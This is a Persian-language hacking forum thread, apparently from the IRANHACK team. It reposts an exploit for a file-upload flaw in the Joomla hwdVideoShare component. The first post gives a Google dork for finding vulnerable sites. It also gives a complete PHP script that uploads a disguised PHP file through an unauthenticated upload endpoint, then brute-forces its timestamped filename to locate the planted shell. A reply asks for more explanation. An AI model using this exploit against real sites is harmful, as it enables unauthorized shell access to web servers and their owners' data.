SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Joomla hwdVideoShare Shell Upload

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • Joomla hwdVideoShare Shell Upload

    [align=LEFT][php]

    Google Dork : inurl:/components/com_hwdvideoshare



    Exploit : depends fonction date() Same country, it's ideal.Attention at
    the time on the target and on the pc which attack.

    PostShell.php
    <?php

    $uploadfile="lo.php.vob";

    $ch =
    curl_init("http://www.exemple.com/components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata'=>"@$uploadfile"));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);

    print "$postResult";
    echo "<br />";

    $i = 0;
    for ($i=1;$i<9999;$i++)
    {
    $n = 4;
    $num = str_pad((int) $i,$n,"0",STR_PAD_LEFT);
    $filename = date('YmdH').$num.$uploadfile;
    $url = "http://www.exemple.com/tmp/".$filename;
    $c = curl_init("$url");
    $postResult2 = curl_exec($c);
    $info = curl_getinfo($c);
    $httpcode = $info['http_code'];
    if($httpcode == 200){
    echo $url;
    curl_close($c);
    exit;
    }
    }
    ?>

    Shell Access : PostShell.php output

    lo.php.vob
    <?php
    phpinfo();
    ?>


    [/php][/align]
    [align=center][/align]

  • #2
    RE: Joomla hwdVideoShare Shell Upload

    میشه در مورد این اکسپلویت یک ذره بیشتر توضیح بدید ؟
    [align=CENTER]In The NaMe Of GoD

    IRANHACK Security Team

    Main Page

    Iranhack.org

    Forum

    Iranhack.org/acc[/align]

    نظر

    صبر کنید ..
    X